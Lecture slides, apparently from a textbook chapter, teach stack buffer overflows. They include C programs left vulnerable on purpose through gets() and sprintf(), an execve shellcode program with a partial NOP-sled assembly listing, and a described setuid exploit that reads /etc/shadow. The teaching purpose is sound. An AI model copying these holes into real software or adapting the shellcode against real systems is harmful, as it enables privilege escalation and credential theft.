buffer overflow part 1

Upload: marvadi

Post on 22-Feb-2018


  • 7/24/2019 Buffer Overflow Part 1

    1/30

    Chapter 10: Buffer Overflow

  • 2/30

    Be Reluctant to Trust

  • 3/30

    A Brief History of Some Buffer Overflow Attacks

  • 4/30

    Buffer Overflow: A very common attack mechanism

    - First widely used by the Morris Worm in 1988
    - Prevention techniques known
    - Still of major concern
      - Legacy of buggy code in widely deployed operating systems and applications
      - Continued careless programming practices by programmers

  • 5/30

    Buffer Overflow / Buffer Overrun

    A buffer overflow, also known as a buffer overrun, is defined in the NIST Glossary of Key Information Security Terms as follows:

    "A condition at an interface under which more input can be placed into a buffer or data holding area than the capacity allocated, overwriting other information. Attackers exploit such a condition to crash a system or to insert specially crafted code that allows them to gain control of the system."

  • 6/30

    Buffer Overflow Basics

    - Programming error when a process attempts to store data beyond the limits of a fixed-sized buffer
    - Overwrites adjacent memory locations
      - Locations could hold other program variables, parameters, or program control flow data
    - Buffer could be located on the stack, in the heap, or in the data section of the process
    - Consequences:
      - Corruption of program data
      - Unexpected transfer of control
      - Memory access violations
      - Execution of code chosen by attacker

  • 7/30

    #include <stdio.h>
    #include <string.h>
    #define FALSE 0
    #define TRUE  1

    /* next_tag() is not shown on the slide; the runs below show it filling
       str1 with "START", so a minimal stand-in is used here. gets() is removed
       in C11; build with -std=gnu99 to reproduce the runs. */
    void next_tag(char *tag) { strcpy(tag, "START"); }

    int main(int argc, char *argv[]) {
        int valid = FALSE;
        char str1[8];
        char str2[8];

        next_tag(str1);
        gets(str2);            /* unbounded read: more than 7 bytes spills into str1 */
        if (strncmp(str1, str2, 8) == 0)
            valid = TRUE;
        printf("buffer1: str1(%s), str2(%s), valid(%d)\n", str1, str2, valid);
    }

    (a) Basic buffer overflow C code

    $ cc -g -o buffer1 buffer1.c
    $ ./buffer1
    START
    buffer1: str1(START), str2(START), valid(1)
    $ ./buffer1
    EVILINPUTVALUE
    buffer1: str1(TVALUE), str2(EVILINPUTVALUE), valid(0)
    $ ./buffer1
    BADINPUTBADINPUT
    buffer1: str1(BADINPUT), str2(BADINPUTBADINPUT), valid(1)

    (b) Basic buffer overflow example runs

    Figure 10.1 Basic Buffer Overflow Example
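    The same tag check done with a bounded read, as an added example that is not part of the slides: fgets() replaces gets(), and the caller learns whether the line fit in the 8-byte buffer instead of the excess silently landing in str1. The function names and the tmpfile()-based harness are this example's own.

```c
#include <stdio.h>
#include <string.h>

/* Read one line into dst (capacity cap), dropping the newline.
 * Returns 1 if the whole line fit, 0 if it was too long (the excess is
 * discarded so the next read starts on a fresh line), -1 on EOF or error. */
static int read_line_bounded(char *dst, size_t cap, FILE *in)
{
    if (cap < 2 || fgets(dst, (int)cap, in) == NULL)
        return -1;
    size_t len = strlen(dst);
    if (len > 0 && dst[len - 1] == '\n') {
        dst[len - 1] = '\0';
        return 1;
    }
    /* No newline: fgets stopped at cap-1 bytes or at the end of the input. */
    int c = fgetc(in);
    if (c == EOF || c == '\n')
        return 1;                      /* the line was exactly cap-1 bytes: it fit */
    while (c != EOF && c != '\n') c = fgetc(in);  /* over-long: discard the rest */
    return 0;
}

/* Bounded version of the Figure 10.1 check: the 8-byte str2 can never be
 * overrun, and an over-long line is rejected (-1) instead of being compared. */
static int tag_matches(const char *str1, FILE *in)
{
    char str2[8];
    if (read_line_bounded(str2, sizeof str2, in) != 1)
        return -1;
    return strncmp(str1, str2, sizeof str2) == 0;
}

/* Harness: feed a constructed input string through a temporary file. */
static int tag_matches_str(const char *str1, const char *input)
{
    FILE *f = tmpfile();
    if (f == NULL || fputs(input, f) == EOF) return -1;
    rewind(f);
    int r = tag_matches(str1, f);
    fclose(f);
    return r;
}

int main(void)
{
    /* Inputs taken from the slide's example runs: only the first is accepted. */
    printf("START            -> %d\n", tag_matches_str("START", "START\n"));
    printf("BADINPUTBADINPUT -> %d\n", tag_matches_str("BADINPUT", "BADINPUTBADINPUT\n"));
    return 0;
}
```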

  • 8/30

    [Figure 10.2 Basic Buffer Overflow Stack Values: a dump of main()'s stack frame in the buffer1 program before and after gets(str2) reads "BADINPUTBADINPUT". Rows, from the highest address (bffffbf4) down: argv, argc, return addr, old base ptr, valid, str1[4-7], str1[0-3], str2[4-7], str2[0-3]. Before the call str1 holds "START"; the 16-byte input fills str2 and runs on into str1, so afterwards both str1 and str2 contain "BADINPUT" and the comparison in Figure 10.1 succeeds.]

  • 9/30

    Buffer Overflow Attacks

    To exploit a buffer overflow an attacker needs:
    - To identify a buffer overflow vulnerability in some program that can be triggered using externally sourced data under the attacker's control
    - To understand how that buffer is stored in memory and determine potential for corruption

    Identifying vulnerable programs can be done by:
    - Inspection of program source
    - Tracing the execution of programs as they process oversized input
    - Using tools such as fuzzing to automatically identify potentially vulnerable programs

  • 10/30

    Programming Language History

    - At the machine level, data manipulated by machine instructions executed by the computer processor are stored in either the processor's registers or in memory
    - Assembly language programmer is responsible for the correct interpretation of any saved data value: is it int, float, pointer, instruction?
    - Modern high-level languages have a strong notion of type and valid operations
      - Not vulnerable to buffer overflows
      - Does incur overhead, some limits on use
    - C and related languages have high-level control structures, but allow direct access to memory, hence are vulnerable to buffer overflow
      - Have a large legacy of widely used, unsafe, and hence vulnerable code

  • 11/30

    Program Loading into Process Memory

  • 12/30

    Stack Buffer Overflows

    - Occur when buffer is located on stack
      - Also referred to as stack smashing
      - Used by Morris Worm (gets)
      - Exploits included an unchecked buffer overflow
    - Are still being widely exploited
    - Stack frame
      - When one function calls another it needs somewhere to save the return address
      - Also needs locations to save the parameters to be passed in to the called function and to possibly save register values

  • 13/30

    Example Stack Frame with Function P Calling Function Q

    What does P need to store when calling Q?

  • 14/30

    Example of Function P Calling Function Q

    The calling function P:

    1. Pushes the parameters for the called function onto the stack (typically in reverse order of declaration)
    2. Executes the call instruction to call the target function, which pushes the return address onto the stack

  • 15/30

    Example of Function P Calling Function Q

    The called function Q:

    3. Pushes the current frame pointer value (which points to the calling routine's stack frame) onto the stack
    4. Sets the frame pointer to be the current stack pointer value (that is, the address of the old frame pointer), which now identifies the new stack frame location for the called function
    5. Allocates space for local variables by moving the stack pointer down to leave sufficient room for them
    6. Runs the body of the called function
    7. As it exits it first sets the stack pointer back to the value of the frame pointer (effectively discarding the space used by local variables)
    8. Pops the old frame pointer value (restoring the link to the calling routine's stack frame)
    9. Executes the return instruction, which pops the saved address off the stack and returns control to the calling function

  • 16/30

    Example of Function P Calling Function Q

    Lastly the calling function P:

    10. Pops the parameters for the called function off the stack
    11. Continues execution with the instruction following the function call.
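    A toy model of the eleven steps above, as an added example that is not from the slides (the names model_stack, enter_q, leave_q, q_body and run_call are this example's own). Memory is an array of 32-bit words; enter_q performs steps 1-5, q_body stands in for step 6 as a copy into a two-word local buffer, and leave_q performs steps 7-10 and returns the address the return instruction would use. Copying four words through the unchecked q_body puts the third word on the saved frame pointer and the fourth on the return address, which is exactly the layout the stack-values figures in this deck show; the checked variant refuses the input and the return address survives.

```c
#include <stdint.h>
#include <string.h>

/* Toy stack: 16 32-bit words, index 0 = lowest address, grows downward. */
#define WORDS 16
typedef struct { uint32_t mem[WORDS]; int sp, fp; } model_stack;
static void push(model_stack *s, uint32_t v) { s->mem[--s->sp] = v; }

/* Steps 1-5 (P calls Q). Returns the index of Q's lowest local word,
 * i.e. where a local buffer starts; the saved frame pointer and the
 * return address sit in the two words directly above it. */
static int enter_q(model_stack *s, uint32_t param, uint32_t ret, int locals)
{
    push(s, param);                 /* 1: P pushes the parameter            */
    push(s, ret);                   /* 2: call pushes the return address    */
    push(s, (uint32_t)s->fp);       /* 3: Q saves P's frame pointer         */
    s->fp = s->sp;                  /* 4: Q's frame pointer = current sp    */
    s->sp -= locals;                /* 5: room for local variables          */
    return s->sp;
}

/* Steps 7-10 (Q returns, P pops the parameter). Returns where ret jumps. */
static uint32_t leave_q(model_stack *s)
{
    s->sp = s->fp;                  /* 7: discard locals                    */
    s->fp = (int)s->mem[s->sp++];   /* 8: pop old frame pointer             */
    uint32_t ret = s->mem[s->sp++]; /* 9: ret pops the return address       */
    s->sp++;                        /* 10: P pops the parameter             */
    return ret;
}

/* Step 6 stand-in for Q's body: copy n words into a 2-word local buffer,
 * bounded when check != 0, unbounded otherwise. Returns 1 if copied. */
static int q_body(model_stack *s, int buf, const uint32_t *in, int n, int check)
{
    if ((check && n > 2) || buf + n > WORDS) return 0;  /* reject over-long input */
    memcpy(&s->mem[buf], in, (size_t)n * sizeof *in);
    return 1;
}

/* One P->Q->P call; 0x11111111 and 0xC0DE0001 are constructed values. */
static uint32_t run_call(const uint32_t *in, int n, int check)
{
    model_stack s = { .sp = WORDS, .fp = WORDS };
    int buf = enter_q(&s, 0x11111111u, 0xC0DE0001u, 2);
    q_body(&s, buf, in, n, check);
    return leave_q(&s);
}
```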

  • 17/30

    Stack Overflow Example

  • 18/30

    Basic Stack Overflow Example

    #include <stdio.h>
    #include <string.h>

    void next_tag(char *tag) { strcpy(tag, "name"); }   /* stand-in: the slide says assume tag=name */

    /* hello() is not printed on this slide; its body is reconstructed from the
       inp[16] buffer and gets(inp) shown in the stack-values figure that follows
       and the prompt text visible in Figure 10.8. gets() is removed in C11. */
    void hello(char *tag)
    {
        char inp[16];
        printf("Enter value for %s: ", tag);
        gets(inp);                                  /* unbounded read into inp[16] */
        printf("Hello your %s is %s\n", tag, inp);
    }

    int main(int argc, char *argv[])
    {
        char tag[8];
        next_tag(tag);    // Assume tag=name
        hello(tag);
    }                     // buffer2

  • 19/30

    Form of Denial of Service

    - Segmentation fault means the system is crashing and not available to users
    - More dangerous if the attacker can make the system do something before crashing, and maybe not crashing at all

  • 20/30

    Forcing a Function to Call Itself

    - The attacker needs to know the address of the function: run the code on a local machine similar to the target machine (OS) and use the debugger to get the address of the function
    - Overwrite the return address to make it the address of the function that the attacker wants to execute

  • 21/30

    [Figure: Basic Stack Overflow Stack Values. A dump of hello()'s stack frame in the buffer2 program before and after gets(inp) reads a 24-byte line. Rows, from the highest address (bffffbe0) down: tag, return addr, old base ptr, two unlabelled padding words, inp[12-15], inp[8-11], inp[4-7], inp[0-3]. After the call inp holds "ABCDEFGHQRSTUVWX", the padding words hold "abcdefgh", and the old base ptr and return addr slots no longer hold their original values: the input has reached main()'s saved frame pointer and the return address.]

  • 22/30

    Basic Stack Overflow Example

  • 23/30

    Buffer Overflow

    The potential for a buffer overflow exists anywhere that data is copied or merged into a buffer where at least some of the data are read from outside the program. The possibility also exists that a program can safely read and save input, pass it around the program, and then at some later time in another function unsafely copy it, resulting in a buffer overflow.

  • 24/30

    #include <stdio.h>

    void getinp(char *inp, int siz)
    {
        puts("Input value: ");
        fgets(inp, siz, stdin);               /* bounded read: safe on its own */
    }

    /* The slide omits this function's header; the name display() is assumed. */
    void display(char *val)
    {
        char tmp[16];
        sprintf(tmp, "read val: %s\n", val);  /* unbounded copy: val of up to 15 bytes plus 11 bytes of fixed text overflows tmp */
        puts(tmp);
    }

    int main(int argc, char *argv[])
    {
        char buf[16];
        getinp(buf, sizeof(buf));
        display(buf);
    }

  • 25/30

    Table 10.2 Some Common Unsafe C Standard Library Routines

    gets(char *str)                              read line from standard input into str
    sprintf(char *str, char *format, ...)        create str according to supplied format and variables
    strcat(char *dest, char *src)                append contents of string src to string dest
    strcpy(char *dest, char *src)                copy contents of string src to string dest
    vsprintf(char *str, char *fmt, va_list ap)   create str according to supplied format and variables
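    The display() step of the getinp example two slides back, with the sprintf() from Table 10.2 replaced by snprintf() and its return value checked, as an added example that is not from the slides (format_read_val and max_val_len are this example's own names). With a 16-byte tmp, the fixed text "read val: " plus "\n" plus the terminating NUL take 12 bytes, so at most 4 bytes of val fit, and the check reports truncation for the 15-byte values getinp() can legitimately deliver.

```c
#include <stdio.h>
#include <string.h>

/* Format "read val: <val>\n" into out (capacity cap) the way display() does,
 * but with a bounded write. snprintf returns the length the full string would
 * have had, so a result >= cap means the message was cut short.
 * Returns 1 if the whole message fit, 0 if it was truncated or failed. */
static int format_read_val(char *out, size_t cap, const char *val)
{
    int n = snprintf(out, cap, "read val: %s\n", val);
    if (n < 0) { out[0] = '\0'; return 0; }
    return (size_t)n < cap;
}

/* Largest val length that fits a buffer of cap bytes: cap minus the fixed
 * "read val: ", the "\n" and the NUL. Mirrors the arithmetic above. */
static int max_val_len(size_t cap)
{
    size_t fixed = strlen("read val: ") + strlen("\n") + 1;
    return cap > fixed ? (int)(cap - fixed) : 0;
}

int main(void)
{
    char tmp[16];                                /* same size as display()'s tmp */
    int ok = format_read_val(tmp, sizeof tmp, "abcd");            /* 4 bytes: fits */
    printf("%d %s", ok, tmp);
    ok = format_read_val(tmp, sizeof tmp, "abcdefghijklmno");     /* 15 bytes: truncated */
    printf("%d %s\n", ok, tmp);
    printf("max val length for 16 bytes: %d\n", max_val_len(sizeof tmp));
    return 0;
}
```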

  • 26/30

    Shellcode

    - Code supplied by attacker
      - Often saved in buffer being overflowed
      - Traditionally transferred control to a user command-line interpreter (shell)
    - Machine code
      - Specific to processor and operating system
      - Traditionally needed good assembly language skills to create
      - More recently a number of sites and tools have been developed that automate this process
    - Metasploit Project
      - Provides useful information to people who perform penetration, IDS signature development, and exploit research

  • 27/30

    #include <unistd.h>

    int main(int argc, char *argv[])
    {
        char *sh;
        char *args[2];

        sh = "/bin/sh";
        args[0] = sh;
        args[1] = NULL;
        execve(sh, args, NULL);
    }

    (a) Desired shellcode code in C

    nop
    nop                  // end of nop sled
    jmp find             // jump to end of code
    cont: pop %esi       // pop address of sh off stack into %esi
    xor %eax,%eax        //

  • 28/30

    [Figure 10.8 Example Stack Overflow Attack: a terminal session. dir -l shows the target buffer4 as a setuid-root executable (-rwsr-xr-x, owner root); whoami reports the unprivileged user knoppix, and cat /etc/shadow is refused with "Permission denied". The attack1 script is a perl one-liner that prints the crafted input line (hex payload omitted here) followed by the commands whoami and cat /etc/shadow. Piping attack1 into buffer4 answers the "Enter value for name:" prompt with that line; whoami then reports root and the contents of /etc/shadow are printed.]

  • 29/30

    Stack Overflow Variants

    Target program can be:
    - A trusted system utility
    - Network service daemon
    - Commonly used library code (image display tool)

    Shellcode functions:
    - Set up a listening service to launch a remote shell when connected to
    - Create a reverse shell that connects back to the hacker
    - Use local exploits that establish a shell
    - Flush firewall rules that currently block other attacks
    - Break out of a chroot (restricted execution) environment, giving full access to the system

  • 30/30

    2oadon

    Cand!